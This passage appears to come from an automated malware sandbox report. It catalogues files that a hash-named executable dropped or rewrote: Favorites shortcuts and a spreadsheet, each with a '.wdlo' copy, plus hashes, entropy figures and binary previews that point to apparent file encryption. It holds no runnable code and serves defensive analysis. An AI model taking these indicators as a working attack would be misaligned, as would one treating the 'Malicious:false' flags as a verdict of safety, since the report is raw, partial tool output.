~.HB9..WJR.4..@.:I`...+7.-...tvx..6.....[B..$.mm...\..P._.WzF...,.s.....a.mb).r...q....-....M..u...su..N<qk&u......&!T.Z.L.....Q+S.....~......}......q....;;nx..-W.t.k.1..T ..:s....`..r..X..o..,\..."`..>....u...w.it.$..E.8I_i.7.xA..U.F...W.2..`h.....?x.Dc;6...O......@.6.8..=\.. ..x...j.. ........Ac.]

                  C:\Users\user\Downloads\WSHEJMDVQC.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.842319938880276
                  Encrypted:false
                  SSDEEP:24:skUT2iFrpesE5KGdU1Ip5dOX8W4+jcHgSDWn/rQ3N+KaAkCD3zbD:k2lsE0Gm1IPw3slSnkd+PAD3nD
                  MD5:3EC820B123F05E687E4C3E1748E07219
                  SHA1:F9969A5FA299440F1D667FE50391BFA4BFA64F6A
                  SHA-256:EEBD7803369FE7EFD531845F4673A9CE5709B799F69686384A4A64AF7330601C
                  SHA-512:3B8131796D4D6541D69D83819641701CE2075A84E605092601518873FEC67D7335BDC7F710608773ECB45E2EE36987B4819B369C38DE38B34572C859C5FE7C80
                  Malicious:false
                  Preview:WSHEJ.a...2....#Rz.A......o".-._.~.aG}T.h#c.B..:B....,.7....6...o.Lz..9;k.8....P..=.B..'.A..=....q..q...}.I.<K?...`..A...d.....L.W.O?..Z}ra..?...=@.ca}|.d#.......ve...c....].~.....+.-7(G.e_@.N... .J.W.. +.+.......I.3.HVO...u.OS......4.........hhx......Hx...;..V}.Ih..3..".2.....1).Td.#TO..9.,.nB`.....6...Lp..bp(..v......b.N...Q.Qj*oCR......#...(..7.g2h.+ ;G.br..r...)M?C...`O.N.....a...Jel...b..g....mO.J.(OX.;.... ..IL....@!.L.>...R:...z{..a..IR.X..l.5..-.;.U..F...9...^/ ..g..h.J....M.%K..PC.$..~. .E.].....3.|..H.... @F]=.#.`p....N..!.'..B.5.b..e.....,.K......M d.k.....2..h.t..s.i..".u..G.8..U...i.o.J....qp.?..@...W.X;....<.....b..).&.*...B ~.HB9..WJR.4..@.:I`...+7.-...tvx..6.....[B..$.mm...\..P._.WzF...,.s.....a.mb).r...q....-....M..u...su..N<qk&u......&!T.Z.L.....Q+S.....~......}......q....;;nx..-W.t.k.1..T ..:s....`..r..X..o..,\..."`..>....u...w.it.$..E.8I_i.7.xA..U.F...W.2..`h.....?x.Dc;6...O......@.6.8..=\.. ..x...j.. ........Ac.]

                  C:\Users\user\Favorites\Amazon.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):445
                  Entropy (8bit):7.36656043318509
                  Encrypted:false
                  SSDEEP:12:Lxbl8lrTiYhXpAlV4NPBTxHBb/VULB2UvYokQDAx36Wcii9a:MlrOY0ktRVULEUOQDy3zbD
                  MD5:FC5D2D4A323E89D49421372754DD87EB
                  SHA1:18A041CEBEDC40C714FBA6FDE4D5D8E00C544738
                  SHA-256:FE643DFA5E2CF0A458B3F4F2D3C7B9FE9DC21CDE6167E1DF4CC59CF956F507A8
                  SHA-512:6856D14A44F1234D0CFC0F38E96300F601CAB091B2026AAD84A147F372A316B3D99A279524A61AB1EA4992E647848AFE163D839ACDE8CF39482E9B603BCA7EB0
                  Malicious:false
                  Preview:[{000B........JrD..P.^7..kI..}..^..E.........B.....$=..t....n....q8V.......X..r6.....)~..@....?.o.6=/..(....3]...u..5...7.i....h..RBv.d.?....x.....{..?..:Q.J..0.Ez..9.h.3^6.P..<u.T~^f.l.........q.....\.'8`..<..O....F.....a.}0.JG......H.._h.~r.fDH.....j.~$........YrO.6F..J........J.Jy....+0D10]mOZ..x."8.....`.vL.....jW....<'.....J.S...c.....@....".i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Amazon.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):445
                  Entropy (8bit):7.36656043318509
                  Encrypted:false
                  SSDEEP:12:Lxbl8lrTiYhXpAlV4NPBTxHBb/VULB2UvYokQDAx36Wcii9a:MlrOY0ktRVULEUOQDy3zbD
                  MD5:FC5D2D4A323E89D49421372754DD87EB
                  SHA1:18A041CEBEDC40C714FBA6FDE4D5D8E00C544738
                  SHA-256:FE643DFA5E2CF0A458B3F4F2D3C7B9FE9DC21CDE6167E1DF4CC59CF956F507A8
                  SHA-512:6856D14A44F1234D0CFC0F38E96300F601CAB091B2026AAD84A147F372A316B3D99A279524A61AB1EA4992E647848AFE163D839ACDE8CF39482E9B603BCA7EB0
                  Malicious:false
                  Preview:[{000B........JrD..P.^7..kI..}..^..E.........B.....$=..t....n....q8V.......X..r6.....)~..@....?.o.6=/..(....3]...u..5...7.i....h..RBv.d.?....x.....{..?..:Q.J..0.Ez..9.h.3^6.P..<u.T~^f.l.........q.....\.'8`..<..O....F.....a.}0.JG......H.._h.~r.fDH.....j.~$........YrO.6F..J........J.Jy....+0D10]mOZ..x."8.....`.vL.....jW....<'.....J.S...c.....@....".i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Bing.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):542
                  Entropy (8bit):7.578431065891799
                  Encrypted:false
                  SSDEEP:12:C/H1PFMeGm1hn3kH2i9F0T/OQ3R+3M36Wcii9a:g1PFgwhn0cmQ83M3zbD
                  MD5:6ADFBC1FFC44BA913B9281E469BAED2D
                  SHA1:1F31F436D3D90907A67F2E19F7C3A445CDE4E01E
                  SHA-256:46E92B2AE77B9B31AE84F02986D84FCDE54EBF38AAE1F118942000FF4E32CF13
                  SHA-512:BB38D4414FC7D52DA6FF1D1ACE6074B4502D109F65394448084CA127A72BCFD8F15B98A9F537AA0A65A9EEFADD648362CD9B6672C4D73E1BBBF16896787DB2E2
                  Malicious:false
                  Preview:[{000I$..j.Y.`.%W....lU'.g.|..$$...d...2..d...6......Q.:....u...Z.+....Kh...x..#...u..jI.]...~.6......[.r..%.,......T.(..h..F.$.....=...!.^fI.=.Q.}......N....4.r'.?.O...xo........4Q......=...^.Xn.d.#.."..^h..O..*.#.a.}.Hyd<....\..6.J{u..BK...&....KH..!{N.5<d..2nZ...xal.-|XCx{K..a.E..C....xPZ..@2..q......t.I]9......Q.c.W.....!w.Jq..e...6...#.2..G............|.g..Gb...#8..>.....+a.Zd~x,.;m..S...]....R.s+t.;...ju2.&..RR.p.........c..6H6F...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Bing.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):542
                  Entropy (8bit):7.578431065891799
                  Encrypted:false
                  SSDEEP:12:C/H1PFMeGm1hn3kH2i9F0T/OQ3R+3M36Wcii9a:g1PFgwhn0cmQ83M3zbD
                  MD5:6ADFBC1FFC44BA913B9281E469BAED2D
                  SHA1:1F31F436D3D90907A67F2E19F7C3A445CDE4E01E
                  SHA-256:46E92B2AE77B9B31AE84F02986D84FCDE54EBF38AAE1F118942000FF4E32CF13
                  SHA-512:BB38D4414FC7D52DA6FF1D1ACE6074B4502D109F65394448084CA127A72BCFD8F15B98A9F537AA0A65A9EEFADD648362CD9B6672C4D73E1BBBF16896787DB2E2
                  Malicious:false
                  Preview:[{000I$..j.Y.`.%W....lU'.g.|..$$...d...2..d...6......Q.:....u...Z.+....Kh...x..#...u..jI.]...~.6......[.r..%.,......T.(..h..F.$.....=...!.^fI.=.Q.}......N....4.r'.?.O...xo........4Q......=...^.Xn.d.#.."..^h..O..*.#.a.}.Hyd<....\..6.J{u..BK...&....KH..!{N.5<d..2nZ...xal.-|XCx{K..a.E..C....xPZ..@2..q......t.I]9......Q.c.W.....!w.Jq..e...6...#.2..G............|.g..Gb...#8..>.....+a.Zd~x,.;m..S...]....R.s+t.;...ju2.&..RR.p.........c..6H6F...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Facebook.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):447
                  Entropy (8bit):7.444266286851758
                  Encrypted:false
                  SSDEEP:12:p1sMiWMZQhDejhE5/BLvAQ+DNYtduZXLDmOwD36Wcii9a:DqWyQGhE/bYmtIlvwD3zbD
                  MD5:CF73363EBEC979137C77587AC7E33625
                  SHA1:924B2661219BEBA70C2E18829C12609821E75C9F
                  SHA-256:B0887DBE50F927C41B4666F4E01E1AF0A36AF848B7B6F303B5A4CC7E3CE6A95F
                  SHA-512:C41525FFD6A1F7DFFDC4AAC67B432E6B420DD28897ED757EC470B6FCEC1B5EECFEAF4A2F3E696E8F0E8FCA561626FB9F2D83F74729A66E53BF574303A1FB7805
                  Malicious:false
                  Preview:[{000Yp.|w...tC..pJ..N9...^.Q.J...Z.i.'..A<..........>......c=...Es...b.\o...h.b.0...Q...>..V..7;2.p...n7\.e..i.!....}..Tz.oig%kY...Q..#,AL....G....(....c..9.F.`X.!hB9..f0.x.J..+n..xE..Q...A.....,J....T:tW?T*...h.@....~.#....H..?..w..~l........ .`*....R........9.z.e..r..H>D..i.._.....0.._...HA_.M.X....Y....O...:.`.!..?..y(...O...Of.....l.)...3.H5a.25i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Facebook.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):447
                  Entropy (8bit):7.444266286851758
                  Encrypted:false
                  SSDEEP:12:p1sMiWMZQhDejhE5/BLvAQ+DNYtduZXLDmOwD36Wcii9a:DqWyQGhE/bYmtIlvwD3zbD
                  MD5:CF73363EBEC979137C77587AC7E33625
                  SHA1:924B2661219BEBA70C2E18829C12609821E75C9F
                  SHA-256:B0887DBE50F927C41B4666F4E01E1AF0A36AF848B7B6F303B5A4CC7E3CE6A95F
                  SHA-512:C41525FFD6A1F7DFFDC4AAC67B432E6B420DD28897ED757EC470B6FCEC1B5EECFEAF4A2F3E696E8F0E8FCA561626FB9F2D83F74729A66E53BF574303A1FB7805
                  Malicious:false
                  Preview:[{000Yp.|w...tC..pJ..N9...^.Q.J...Z.i.'..A<..........>......c=...Es...b.\o...h.b.0...Q...>..V..7;2.p...n7\.e..i.!....}..Tz.oig%kY...Q..#,AL....G....(....c..9.F.`X.!hB9..f0.x.J..+n..xE..Q...A.....,J....T:tW?T*...h.@....~.#....H..?..w..~l........ .`*....R........9.z.e..r..H>D..i.._.....0.._...HA_.M.X....Y....O...:.`.!..?..y(...O...Of.....l.)...3.H5a.25i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Google.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):445
                  Entropy (8bit):7.505770179032441
                  Encrypted:false
                  SSDEEP:12:uBWAV5GwqwFMlhIO6AboPrlSL2OgIgCn36Wcii9a:uBWjwOjIqoK2OgW3zbD
                  MD5:833CC3E369FF743C0064E9CD7E246754
                  SHA1:7438239D68F85E97A1B84FD7E6FDD0F3C445242E
                  SHA-256:454336CEA594D5DCD324FFEFFA76FAA5E06F8D9BB4117BB94D63551DDD76D2FD
                  SHA-512:B96C626991BDA97E2E0C588A685191AB54C480C59944E28CF571ABECD337F8D01CB1343ABC6101447AE80FFDF80B03AF69ED0D4326FE0D8E2655729066AFA217
                  Malicious:false
                  Preview:[{000.Q......s!@.2....vD....1./OX.I......oOl..%...d.....n......$n...e...H.#e.........[.Hm.Te..o....&i:..#aq.Y......kQ...@/.......@.E/....0\3].r..R.i..._..$st..n.o..45.\..3.~QB..l9.T..U.5...........{Q~_.hT..E*H...Wy..!...Z..2A.~.'...%.S.|.'....,.*.G_..V!Y.]..K.SB.;Z..;....|.{.6v.1P..?@..{.e..z.-;"Q&.G....8#{..V..>Hc..OI...4....K...M....q..;....._i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Google.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):445
                  Entropy (8bit):7.505770179032441
                  Encrypted:false
                  SSDEEP:12:uBWAV5GwqwFMlhIO6AboPrlSL2OgIgCn36Wcii9a:uBWjwOjIqoK2OgW3zbD
                  MD5:833CC3E369FF743C0064E9CD7E246754
                  SHA1:7438239D68F85E97A1B84FD7E6FDD0F3C445242E
                  SHA-256:454336CEA594D5DCD324FFEFFA76FAA5E06F8D9BB4117BB94D63551DDD76D2FD
                  SHA-512:B96C626991BDA97E2E0C588A685191AB54C480C59944E28CF571ABECD337F8D01CB1343ABC6101447AE80FFDF80B03AF69ED0D4326FE0D8E2655729066AFA217
                  Malicious:false
                  Preview:[{000.Q......s!@.2....vD....1./OX.I......oOl..%...d.....n......$n...e...H.#e.........[.Hm.Te..o....&i:..#aq.Y......kQ...@/.......@.E/....0\3].r..R.i..._..$st..n.o..45.\..3.~QB..l9.T..U.5...........{Q~_.hT..E*H...Wy..!...Z..2A.~.'...%.S.|.'....,.*.G_..V!Y.]..K.SB.;Z..;....|.{.6v.1P..?@..{.e..z.-;"Q&.G....8#{..V..>Hc..OI...4....K...M....q..;....._i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Live.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):443
                  Entropy (8bit):7.447612848156349
                  Encrypted:false
                  SSDEEP:12:vcu9CNW3EQip/ieMHDhWpMCEQT36Wcii9a:v59CNWU4VWCCFT3zbD
                  MD5:DB21BB3E7F26F44CC2B391AC916AB79E
                  SHA1:351B7BF6941C5C4E1ABE7C5A7B27D6D94CD13242
                  SHA-256:979EF5310360F9DB6917EEFA943E0DBACC21983A58CF1369C22D08F426E003D7
                  SHA-512:144DBE2D2E353F0F855004D847F56CF1E48F0FE33DE1ED6F08C39E98A5C47D24278388DDEB424E0CD8B9E5BAACEB1933024FFFB810A34D99B34044F7C095F6C2
                  Malicious:false
                  Preview:[{000..y....].$..lTF!...Y.-./.)..`._!.r.i..&.b.^a\.....D?.*$.$_...E....k...)DH.}....".{....p.a..Xq...&...A..k.[Q.. ........;fn.......4......|h..j.....z.7.^i.V7....e.C..*8.........{"..7K....a.....&+..".....|......"W.f...2..!...F6g.1...!.8.LV.K.....d..Wj...{,!+....[..?./....@P...Q.\..!.b....`.1....Q.P....1..i.....3g....o.k........BB~+*Is~.Z..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Live.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):443
                  Entropy (8bit):7.447612848156349
                  Encrypted:false
                  SSDEEP:12:vcu9CNW3EQip/ieMHDhWpMCEQT36Wcii9a:v59CNWU4VWCCFT3zbD
                  MD5:DB21BB3E7F26F44CC2B391AC916AB79E
                  SHA1:351B7BF6941C5C4E1ABE7C5A7B27D6D94CD13242
                  SHA-256:979EF5310360F9DB6917EEFA943E0DBACC21983A58CF1369C22D08F426E003D7
                  SHA-512:144DBE2D2E353F0F855004D847F56CF1E48F0FE33DE1ED6F08C39E98A5C47D24278388DDEB424E0CD8B9E5BAACEB1933024FFFB810A34D99B34044F7C095F6C2
                  Malicious:false
                  Preview:[{000..y....].$..lTF!...Y.-./.)..`._!.r.i..&.b.^a\.....D?.*$.$_...E....k...)DH.}....".{....p.a..Xq...&...A..k.[Q.. ........;fn.......4......|h..j.....z.7.^i.V7....e.C..*8.........{"..7K....a.....&+..".....|......"W.f...2..!...F6g.1...!.8.LV.K.....d..Wj...{,!+....[..?./....@P...Q.\..!.b....`.1....Q.P....1..i.....3g....o.k........BB~+*Is~.Z..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\NYTimes.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):446
                  Entropy (8bit):7.390908501382814
                  Encrypted:false
                  SSDEEP:12:xp9kYVHxt4tRYjkJSZ9cTOfUpEObyuhbD36Wcii9a:L9zH/yHSZadyuhv3zbD
                  MD5:65E0CBE618A159689433FA114C1AF1CB
                  SHA1:264021B82DB15C5241B8FFAF84BC938832E89940
                  SHA-256:AA1D44C6093870F22CB6C24B135D7F01D11581FF3B286B5EA5D14F55E133F388
                  SHA-512:6D41B9778A085F6BB984B485318F0ADD89F4DCA28FF91BBDD126EF12E16C6D78571B97FFBA3BD9EC07AA544461718AAEAFD69AA34D193868E29F66F456B0D77D
                  Malicious:false
                  Preview:[{000.:....7z.. .[D..c.de8.oi......n.....m.`?.E<......AUJ!L....C.L...( \!.:...F.I.<. ....%.._:.;!......0..1b....t.Ho.G.o.)Z.X..-....qO..s...:....vOj.2Y.....f..$.....op...H(.M.\..({e.T....Z...)..x.b.I..Q.<]....O.OB..J.k....8..~.R.....G.Sk..p..9.P.s...........u.0=..F.M.=%.r.....$....hu81.I&...c..PG.c......3~.H..:..m....V{.9...G...[/......vB..3.lM&....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\NYTimes.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):446
                  Entropy (8bit):7.390908501382814
                  Encrypted:false
                  SSDEEP:12:xp9kYVHxt4tRYjkJSZ9cTOfUpEObyuhbD36Wcii9a:L9zH/yHSZadyuhv3zbD
                  MD5:65E0CBE618A159689433FA114C1AF1CB
                  SHA1:264021B82DB15C5241B8FFAF84BC938832E89940
                  SHA-256:AA1D44C6093870F22CB6C24B135D7F01D11581FF3B286B5EA5D14F55E133F388
                  SHA-512:6D41B9778A085F6BB984B485318F0ADD89F4DCA28FF91BBDD126EF12E16C6D78571B97FFBA3BD9EC07AA544461718AAEAFD69AA34D193868E29F66F456B0D77D
                  Malicious:false
                  Preview:[{000.:....7z.. .[D..c.de8.oi......n.....m.`?.E<......AUJ!L....C.L...( \!.:...F.I.<. ....%.._:.;!......0..1b....t.Ho.G.o.)Z.X..-....qO..s...:....vOj.2Y.....f..$.....op...H(.M.\..({e.T....Z...)..x.b.I..Q.<]....O.OB..J.k....8..~.R.....G.Sk..p..9.P.s...........u.0=..F.M.=%.r.....$....hu81.I&...c..PG.c......3~.H..:..m....V{.9...G...[/......vB..3.lM&....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Reddit.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):445
                  Entropy (8bit):7.4480381575697825
                  Encrypted:false
                  SSDEEP:12:FC9229E6cmNv2hPVNz+ZakYJOrr136Wcii9a:FC922O6hktNzqX7P13zbD
                  MD5:A7701CDAB67B1D0D39CE8BC95CF77720
                  SHA1:B7C0E89BA9D47E17D3566C69E049437C94A4F28E
                  SHA-256:C4DF4335BD7A049BDA7517CE12BFF2942F6DF181D69F9A9AF0747922AEAD5E27
                  SHA-512:D0FD861D02935A1F111E29828CF46947E93E0FA8D78B3D09537C58203426E01D0C20C2A5C6C478C0799138830AEA20BF817589FD7FE178ED02A127F6224F7519
                  Malicious:false
                  Preview:[{000(..,.1z0.p..`..+.....:..57..v.m..gQ.K..Y....f.>.C..2"t.Ku#..kA^|...o....T....1.`k.p5........55S.P......xb.....c......%..V...-.7l#.F..........I...6Y..u.|.Fl..G.......j.X.j.@.N.?.......W..i.`I....?y..>.u0....Y.W}ll.........=)U2..5h]J.....S.V.m..~...w.h.f..Q....~.CpVt.=...Oe>..q.I43W....b..]<,.7.p..D.2.G.6.cz.V.c.S}=..EL...:.....l.d..T.?.p.Ji0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Reddit.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):445
                  Entropy (8bit):7.4480381575697825
                  Encrypted:false
                  SSDEEP:12:FC9229E6cmNv2hPVNz+ZakYJOrr136Wcii9a:FC922O6hktNzqX7P13zbD
                  MD5:A7701CDAB67B1D0D39CE8BC95CF77720
                  SHA1:B7C0E89BA9D47E17D3566C69E049437C94A4F28E
                  SHA-256:C4DF4335BD7A049BDA7517CE12BFF2942F6DF181D69F9A9AF0747922AEAD5E27
                  SHA-512:D0FD861D02935A1F111E29828CF46947E93E0FA8D78B3D09537C58203426E01D0C20C2A5C6C478C0799138830AEA20BF817589FD7FE178ED02A127F6224F7519
                  Malicious:false
                  Preview:[{000(..,.1z0.p..`..+.....:..57..v.m..gQ.K..Y....f.>.C..2"t.Ku#..kA^|...o....T....1.`k.p5........55S.P......xb.....c......%..V...-.7l#.F..........I...6Y..u.|.Fl..G.......j.X.j.@.N.?.......W..i.`I....?y..>.u0....Y.W}ll.........=)U2..5h]J.....S.V.m..~...w.h.f..Q....~.CpVt.=...Oe>..q.I43W....b..]<,.7.p..D.2.G.6.cz.V.c.S}=..EL...:.....l.d..T.?.p.Ji0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Twitter.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):446
                  Entropy (8bit):7.487203811621061
                  Encrypted:false
                  SSDEEP:12:qLfoYvcti7iDq8BOvTgWOCE1j936Wcii9a:0okVk9JCEv3zbD
                  MD5:B5CB92BFDE7357164A9B333BA9157BB2
                  SHA1:37E288F2B3AC8C11F19A4FC42BAD5F7C45E53BE6
                  SHA-256:0266644ABFCA837EA58BB329E9A1D73B9D3ED28B3F18930E37C0F6CA4AF8CAB2
                  SHA-512:979F93077222A8058B72D02F78EEE1200FF9F8D8FBE99BD503D9FC9D0C5770F44B8293EA0E0099F0A66C7363D179E7A5CAE4A9EF87AE8F9ED80505DA332EE51F
                  Malicious:false
                  Preview:[{000.,..t..i.F)8.|h.:.6R.R>._.Oap.KD .!.u&...L........5%C-....9.?..-.kSE.].....@[......?.........^.o.M18.IV..N=N.......Z\-sx9..7....z.....K*2 5..n7.46i4k.......J.$...:<.>......:~.Q.3.O>...F....]A.....&.K.f...I\.5..0[......0 ..h.........,.\O.!fS%.[..b.Y......JHz..L.h$...H?..b~..}..UiJ_^..FW...G.0.I[.(......r-).F..Z....-.?W3X..DP....}......L. ...@.....ni0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Twitter.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):446
                  Entropy (8bit):7.487203811621061
                  Encrypted:false
                  SSDEEP:12:qLfoYvcti7iDq8BOvTgWOCE1j936Wcii9a:0okVk9JCEv3zbD
                  MD5:B5CB92BFDE7357164A9B333BA9157BB2
                  SHA1:37E288F2B3AC8C11F19A4FC42BAD5F7C45E53BE6
                  SHA-256:0266644ABFCA837EA58BB329E9A1D73B9D3ED28B3F18930E37C0F6CA4AF8CAB2
                  SHA-512:979F93077222A8058B72D02F78EEE1200FF9F8D8FBE99BD503D9FC9D0C5770F44B8293EA0E0099F0A66C7363D179E7A5CAE4A9EF87AE8F9ED80505DA332EE51F
                  Malicious:false
                  Preview:[{000.,..t..i.F)8.|h.:.6R.R>._.Oap.KD .!.u&...L........5%C-....9.?..-.kSE.].....@[......?.........^.o.M18.IV..N=N.......Z\-sx9..7....z.....K*2 5..n7.46i4k.......J.$...:<.>......:~.Q.3.O>...F....]A.....&.K.f...I\.5..0[......0 ..h.........,.\O.!fS%.[..b.Y......JHz..L.h$...H?..b~..}..UiJ_^..FW...G.0.I[.(......r-).F..Z....-.?W3X..DP....}......L. ...@.....ni0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Wikipedia.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):448
                  Entropy (8bit):7.37970811093072
                  Encrypted:false
                  SSDEEP:12:uRT2b5FiFXfDFzr4atsIFzIPC3ID02x36Wcii9a:TQx4atskzIpD0E3zbD
                  MD5:BF42C0D60CF71CAC4D9E8E60631D2641
                  SHA1:F99A42F2FEC01B03F8F36B1208C290E0B618CCD2
                  SHA-256:B387E7A1104167EA2610E0BCAF4566E277A38EDF7302150F187F368671F6E3F1
                  SHA-512:105BC3F5649D0B30D906BD50221517DE202C771B62582022F1D9692CA06BF0DD6AD4CAD25125E411FF9D8834A4D5ABEA33626C9B25F99134F088DC4217223282
                  Malicious:false
                  Preview:[{000.s.:.+._....[E.f:......:.....h.G`^HEP...nvV.V2...{.=.....w9..6!.'X2f.n......".Yu..:'..xb...3...X....g"3..m%u..}.$....%..:.M.._Zt]a.h.%.J....6H...-m.:Z..8.hS..0&....p....On...>U..l.V..2(q...9.r.D..N6..L...=&.]..M4...5..hv7.I{...%`.{.!'..P.GD..}..q0e3({b.`.t..U.2...Ya....xg.,i./..O..S...Y4..T..>.....v....$..\....O$.2*!.F....U...9.}ao~.?r.@..<0i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Wikipedia.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):448
                  Entropy (8bit):7.37970811093072
                  Encrypted:false
                  SSDEEP:12:uRT2b5FiFXfDFzr4atsIFzIPC3ID02x36Wcii9a:TQx4atskzIpD0E3zbD
                  MD5:BF42C0D60CF71CAC4D9E8E60631D2641
                  SHA1:F99A42F2FEC01B03F8F36B1208C290E0B618CCD2
                  SHA-256:B387E7A1104167EA2610E0BCAF4566E277A38EDF7302150F187F368671F6E3F1
                  SHA-512:105BC3F5649D0B30D906BD50221517DE202C771B62582022F1D9692CA06BF0DD6AD4CAD25125E411FF9D8834A4D5ABEA33626C9B25F99134F088DC4217223282
                  Malicious:false
